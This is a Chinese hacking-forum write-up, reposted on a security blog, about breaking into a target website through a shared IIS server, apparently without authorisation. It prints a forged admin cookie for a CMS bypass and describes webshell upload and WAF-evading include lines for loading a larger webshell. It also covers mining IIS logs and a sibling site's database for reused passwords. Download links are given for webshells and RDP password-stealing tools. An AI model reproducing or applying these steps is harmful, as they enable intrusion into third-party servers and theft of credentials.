一次服务器iis日志跨站拿下目标站

admin
admin
admin
102932
文章
87
评论
2021年9月1日17:00:34评论56 views字数 2121阅读7分4秒阅读模式

from:https://forum.90sec.org/forum.php?mod=viewthread&tid=8922

一个站 有waf 注入不想尝试,上传还可以试试,好在服务器上网站多,但多数是动易的!

但是扫备份扫到个 admin.rar 下载下来就只有后台目录文件 ,知道了动易的后台认证码 888
也是默认的认证码之一!!尝试了几个没有弱口令

有waf 要么找上传,注入是比较麻烦了!! 整理了下旁站 都是分站,首先目标站我也不知道是,说要服务器。

用M7lrvCmsForm.exe扫到个 智睿网站管理系统 百度了下漏洞 发现个cookies 存在漏洞。

cookie:
Code:rtime=1; ltime=1268355028173; cnzz_eid=62880375-1268290090-; cnzz_a1746221=4; sin1746221=none; ASPSESSIONIDASCSQRQT=GCDLGCMAFJLHLFPOIKOPKNNF; ZhiRui=Check=ZhiRuiSystem&AdminPurview=%7C111%2C%7C112%2C%7C113%2C%7C114%2C%7C115%2C%7C116%2C%7C117%2C%7C118%2C%7C119%2C%7C121%2C%7C122%2C%7C123%2C%7C211%2C%7C212%2C%7C213%2C%7C214%2C%7C311%2C%7C312%2C%7C313%2C%7C314%2C%7C1011%2C%7C1012%2C%7C1013%2C%7C1014%2C%7C511%2C%7C512%2C%7C513%2C%7C514%2C%7C611%2C%7C612%2C%7C711%2C%7C712%2C%7C713%2C%7C714%2C%7C411%2C%7C412%2C%7C413%2C%7C414%2C%7C415%2C%7C811%2C%7C812%2C%7C813%2C%7C814%2C%7C815%2C%7C911%2C&ZhiRuiUser=%B9%DC%C0%ED%D4%B1&ZhiRuiAdmin=newborn

用啊D登录admin/Admin_index.asp
添加用户 在用别的浏览器登录 上传doc 备份拿到shell
权限很小,不支持aspx php 等其他!
一次服务器iis日志跨站拿下目标站
一次服务器iis日志跨站拿下目标站
要提权服务器,本来打算放弃了,组件不支持,又只支持asp,还有waf恶心!
朋友说拿下目标站也可以,目标站是 abc.bbb.com 直接日他,日不下,是动易的 社工密码不成功,验证码是888!!
又不能跨站 ,从其他旁站入手 我又不想,旁站也没有支持aspx的!!
系统目录权限还是可以看,分析服务器日志 试试,反正社工目标动易网站也可以,他就开了80 分析 iis日志,
c:/windows/system32/logfiles/w3svc1/,默认每天一个日志
很多个日志 一个个看一下也不知道是哪个站的日志,

一次服务器iis日志跨站拿下目标站
有waf mdb的不能下载 但是可以下载rar,但是也不知道是哪个站 url是什麽!

一次服务器iis日志跨站拿下目标站
我site:bbb.com inurl:/tyzs/hqjt/images/
结果搜到一条 确定搜索到站是 hqjt.bbb.com 下载到了rar ,是动易的,整站 明小子打开数据库查看到了密码!
首先我用这个密码社工了一下目标站 不成功,本来也只是想收集收集密码 社目标站点 解密 进入后台 没成功
如果是同ip的话 不是分站 什么的就 ip:x.x.x.x inurl:/tyzs/hqjt/images/ 自己变换
动易后台拿shell 网上有 http://www.chncto.com/heikejishu/10629.html
waf很变态 我也用过狗的asp一句话 过了 但是之前不栏的过狗菜刀这也拦截 换了论坛的这个过狗菜刀
链接: http://pan.baidu.com/s/1gdGwJfl 密码: vdj9 可能有后门!
链接成功 发现权限大好多了!

一次服务器iis日志跨站拿下目标站
发现上级目录可以跨,心里猜应该拿下了,但是一时没找到 上传个大马找找吧包含过waf
授权.asp 内容
asp和aspx 本地包含
<!--#include file="dama.txt"-->
php的本地包含
<?php require_once ("dama.txt"); ?>
asp大马:
链接: http://pan.baidu.com/s/1qWtdNFe 密码: evrx
找到目标站点一个特有的图片地址:

一次服务器iis日志跨站拿下目标站
跨站不了的哦时候可以试试 特别是个人服务器 拿下旁站社也是思路,
其实运气占多数,现在提权拿下服务器也是很有可能了,但是目标站已经被拿下了,
这个么多个站下载数据库,密码组合,去社也是可以!!!
别轻易放弃,说不定运气就被你找到了!


劫持记录3389密码小工具

1.WinlogonHack
2.WinPswLogger
外加一个 分析cain嗅探到的3389密码整理工具 后门自测!
链接: http://pan.baidu.com/s/1kTvV9GF 密码: ddfh


小歪说:文章的思路很好值得学习一下,然后最近出差,时间不是很多,所以发的会比较慢,多多包涵。:D

本文始发于微信公众号(关注安全技术):一次服务器iis日志跨站拿下目标站

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日17:00:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次服务器iis日志跨站拿下目标站https://cn-sec.com/archives/502860.html

发表评论

匿名网友 填写信息